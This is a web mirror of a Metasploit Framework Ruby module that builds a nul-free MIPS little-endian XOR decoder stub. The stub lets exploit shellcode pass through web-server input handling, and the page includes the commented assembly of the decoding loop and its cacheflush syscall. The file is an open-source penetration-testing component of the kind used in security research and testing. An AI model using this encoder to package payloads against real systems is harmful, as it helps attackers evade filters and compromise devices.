Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/encoders/mipsle/longxor.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'metasm'

7


8
class MetasploitModule < Msf::Encoder::Xor

9


10
  def initialize

11
    super(

12
      'Name' => 'XOR Encoder',

13
      'Description' => %q{

14
        Mips Web server exploit friendly xor encoder.

15
      },

16
      'Author' => [

17
        'Julien Tinnes <julien[at]cr0.org>', # original shellcode

18
        'Pedro Ribeiro <[email protected]>' # fix Linux >= 2.6.11 and toupper() compat

19
      ],

20
      'Arch' => ARCH_MIPSLE,

21
      'License' => MSF_LICENSE,

22
      'Decoder' => {

23
        'KeySize' => 4,

24
        'BlockSize' => 4,

25
        'KeyPack' => 'V'

26
      }

27
    )

28
  end

29


30
  #

31
  # Returns the decoder stub that is adjusted for the size of the buffer

32
  # being encoded.

33
  #

34
  def decoder_stub(state)

35
    # add one xor operation for the key (see comment below)

36
    number_of_passes = state.buf.length / 4 + 1

37
    raise EncodingError, "The payload being encoded is too long (#{state.buf.length} bytes)" if number_of_passes > 10240

38
    raise EncodingError, "The payload is not padded to 4-bytes (#{state.buf.length} bytes)" if state.buf.length % 4 != 0

39


40
    # 16-bits not (again, see below)

41
    reg_10 = (number_of_passes + 1) ^ 0xFFFF

42
    reg_5 = state.buf.length ^ 0xFFFF

43
    decoder = Metasm::Shellcode.assemble(Metasm::MIPS.new(:little), <<~EOS).encoded.data

44
      ;

45
      ; MIPS nul-free xor decoder

46
      ;

47
      ; (C) 2006 Julien TINNES

48
      ; <julien at cr0.org>

49
      ;

50
      ; The first four bytes in encoded shellcode must be the xor key

51
      ; This means that you have to put the xor key right after

52
      ; this xor decoder

53
      ; This key will be considered part of the encoded shellcode

54
      ; by this decoder and will be xored, thus becoming 4NULs, meaning nop

55
      ;

56
      ; This is Linux-only because I use the cacheflush system call

57
      ;

58
      ; You can use shellforge to assemble this, but be sure to discard all

59
      ; the nul bytes at the end (everything after x01\\x4a\\x54\\x0c)

60
      ;

61
      ; change 2 bytes in the first instruction's opcode with the number of passes

62
      ; the number of passes is the number of xor operations to apply, which should be

63
      ; 1 (for the key) + the number of 4-bytes words you have in your shellcode

64
      ; you must encode ~(number_of_passes + 1) (to ensure that you're nul-free)

65


66


67
      ;.text

68
      ;.align	2

69
      ;.globl	main

70
      ;.ent	main

71
      ;.type		 main,@function

72


73
      main:

74


75
      li macro reg, imm

76
      ;	lui reg, ((imm) >> 16) & 0ffffh

77
      ;	ori reg, reg, (imm) & 0ffffh

78
        addiu reg, $0, imm		    ; sufficient if imm.abs <= 0x7fff

79
      endm

80


81
        li(	$10, #{reg_10})		    ; load number of passes ^ 0xffff

82
        nor	$10, $10, $0		      ; put number of passes in $10

83


84
        li(	$11,-89)		          ; addend to calculated PC is 73

85
      ;.set noreorder

86
      next:

87
        bltzal  $8, next

88
      ;.set reorder

89
        slti    $8, $0, 0x8282

90
        nor     $11, $11, $0	    ; addend in $9

91
        addu	$25, $31, $11		    ; $25 points to encoded shellcode +4

92
        addu	$16, $31, $11		    ; $16 too (used to set up the cacheflush() arg down below)

93


94
      ;	lui	$2, 0xDDDD     		    ; first part of the xor (old method)

95
        slti	$23, $0, 0x8282     ; store 0 in $23 (our counter)

96
      ;	ori	$17, $2, 0xDDDD 	    ; second part of the xor (old method)

97
        lw	$17, -4($25)		      ; load xor key in $17

98


99


100
        li(	$9, -5)

101
        nor	$9, $9, $0		        ; 4 in $9

102


103
        addi	$15, $9, -3		      ; 1 in $15

104
      loop:

105
        lw	$8, -4($25)

106


107
        addu	$23, $23, $15		    ; increment counter

108
        xor	$3, $8, $17

109
        sltu	$30, $23, $10		    ; enough loops?

110
        sw	$3, -4($25)

111
        addi	$6, $9, -1		      ; 3 in $6 (for cacheflush)

112
        bne	$0, $30, loop

113
        addu	$25, $25, $9		    ; next instruction to decode :)

114


115


116
        addiu	$4, $16, -4         ; cacheflush() addr parameter

117
        li(      $10,#{reg_5})    ; cacheflush() nbytes parameter

118
        nor   $5, $10, $0         ; same as above

119
      ;   li      $6,3            ; $6 is set above, 3rd arg for cacheflush()

120


121
      ;	.set    noreorder

122
        li(     $2, 4147)         ; cacheflush

123
      ;   .ascii "\\x01JT\\x0c"   ; nul-free syscall

124
        syscall 0x52950

125
      ;	.set    reorder

126


127


128
      ; write last decoder opcode and decoded shellcode

129
      ;	li      $4,1              ; stdout

130
      ;	addi	$5, $16, -8

131
      ;	li      $6,40             ; how much to write

132
      ;	.set    noreorder

133
      ;	li      $2, 4004          ; write

134
      ;	syscall

135
      ;	.set    reorder

136


137


138
        nop				                ; encoded shellcoded must be here (xor key right here ;)

139
      ; $t9 (aka $25) points here

140


141
    EOS

142
    # put the key at the end of the decoder

143
    state.decoder_key_offset = decoder.length - 4

144


145
    return decoder

146
  end

147
end

148


149